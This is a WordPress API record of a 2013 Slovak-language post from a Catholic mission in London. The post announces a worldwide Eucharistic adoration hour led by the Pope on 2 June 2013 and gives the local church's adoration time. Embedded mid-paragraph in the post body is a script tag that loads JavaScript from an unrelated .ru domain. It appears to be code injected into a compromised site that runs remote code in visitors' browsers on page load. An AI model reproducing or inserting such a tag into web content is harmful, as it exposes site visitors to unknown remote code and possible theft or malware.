{"id":15884,"date":"2013-05-29T15:49:39","date_gmt":"2013-05-29T14:49:39","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=15884"},"modified":"2013-05-30T00:36:06","modified_gmt":"2013-05-29T23:36:06","slug":"zjednotenie-sa-v-poklone-eucharistickemu-kristovi","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=15884","title":{"rendered":"Zjednotenie sa v poklone eucharistick\u00e9mu Kristovi"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/poklona-pred-sviatostou.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-15885\" alt=\"poklona pred sviatostou\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/poklona-pred-sviatostou-150x150.jpg\" width=\"150\" height=\"150\" \/><\/a>Arcibiskup Salvatore Fisichella a jeho spolupracovn\u00edci dnes v Tla\u010dovom stredisku Sv\u00e4tej stolice predstavili nadch\u00e1dzaj\u00face udalosti Roku viery. Ide o ador\u00e1ciu, ktor\u00e1 spoj\u00ed v jednom momente cel\u00fd svet a podujatie Evangelium vitae.<\/p>\n<p style=\"text-align: justify;\">&#8222;Dnes predstavujeme \u010fal\u0161ie dve udalosti, ktor\u00e9 bud\u00fa sprev\u00e1dza\u0165 bud\u00faci priebeh Roku viery. V prvom rade je to eucharistick\u00e1 ador\u00e1cia, ktor\u00e1 sa bude kona\u0165 v Bazilike sv. Petra v nede\u013eu 2. j\u00fana od 17:00 do 18:00 h. (&#8230;) Cirkev za\u017eije vo svojich dejin\u00e1ch podobn\u00fa udalos\u0165 v\u00f4bec po prv\u00fdkr\u00e1t, m\u00f4\u017eeme ju preto ozna\u010di\u0165 za historick\u00fa. Katedr\u00e1ly z cel\u00e9ho sveta sa v t\u00fato hodinu synchronizuj\u00fa s r\u00edmskym \u010dasom, aby pre\u017eili spolo\u010denstvo v eucharistickej ador\u00e1cii so Sv\u00e4t\u00fdm Otcom.&#8220;<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n<p style=\"text-align: justify;\">Veriaci mnoh\u00fdch kraj\u00edn sa do ador\u00e1cie zapoja v re\u00e1lnom \u010dase, teda krajiny ako Honolulu, Cookove ostrovy a s\u00faostrovie Samoa sa bud\u00fa modli\u0165 s cel\u00fdm svetom r\u00e1no o 5:00 h r\u00e1no. Pri ador\u00e1cii bud\u00fa veriaci uva\u017eova\u0165 nad t\u00e9mou Jeden P\u00e1n, jedna viera.<\/p>\n<p style=\"text-align: justify;\">Franti\u0161ek u\u017e stanovil dva hlavn\u00e9 \u00famysly modlitieb: \u201eza Cirkev na celom svete\u201c, aby ju \u201eP\u00e1n robil poslu\u0161nou v po\u010d\u00favan\u00ed svojho Slova\u201c a za \u201er\u00f4zne \u010dasti sveta, ktor\u00e9 za\u017e\u00edvaj\u00fa utrpenie nov\u00e9ho otroctva, s\u00fa obe\u0165ami vojen, obchodovania s \u013eu\u010fmi, obchodovania s drogami, otrockej pr\u00e1ce, tie\u017e za deti a \u017eeny, ktor\u00e9 trpia akouko\u013evek formou n\u00e1silia\u201c. Modlitby bud\u00fa aj za t\u00fdch, ktor\u00ed sa nach\u00e1dzaj\u00fa v ekonomickej neistote, predov\u0161etk\u00fdm nezamestnan\u00fdch, star\u0161\u00edch, migrantov, bezdomovcov, v\u00e4z\u0148ov a marginalizovan\u00fdch.<\/p>\n<h4 style=\"text-align: justify;\">Na\u0161a misia sa prip\u00e1ja k tejto v\u00fdzve sv. Otca. T\u00e1to ador\u00e1cia v na\u0161om kostole bude z d\u00f4vodu \u010dasov\u00fdch mo\u017enost\u00ed pou\u017e\u00edvania chr\u00e1mu v nede\u013eu 2.j\u00fana 2013 od 14.00 &#8211; 15.00 hod.<\/h4>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/sv.Petra_.jpg\" data-rel=\"lightbox-image-1\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-15886\" alt=\"sv.Petra\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/sv.Petra_.jpg\" width=\"301\" height=\"167\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/sv.Petra_.jpg 301w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/sv.Petra_-300x166.jpg 300w\" sizes=\"auto, (max-width: 301px) 100vw, 301px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Arcibiskup Salvatore Fisichella a jeho spolupracovn\u00edci dnes v Tla\u010dovom stredisku Sv\u00e4tej stolice predstavili nadch\u00e1dzaj\u00face udalosti Roku viery. Ide o ador\u00e1ciu, ktor\u00e1 spoj\u00ed v jednom momente cel\u00fd svet a podujatie Evangelium&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=15884\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-15884","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/15884","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15884"}],"version-history":[{"count":3,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/15884\/revisions"}],"predecessor-version":[{"id":15888,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/15884\/revisions\/15888"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15884"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15884"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15884"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}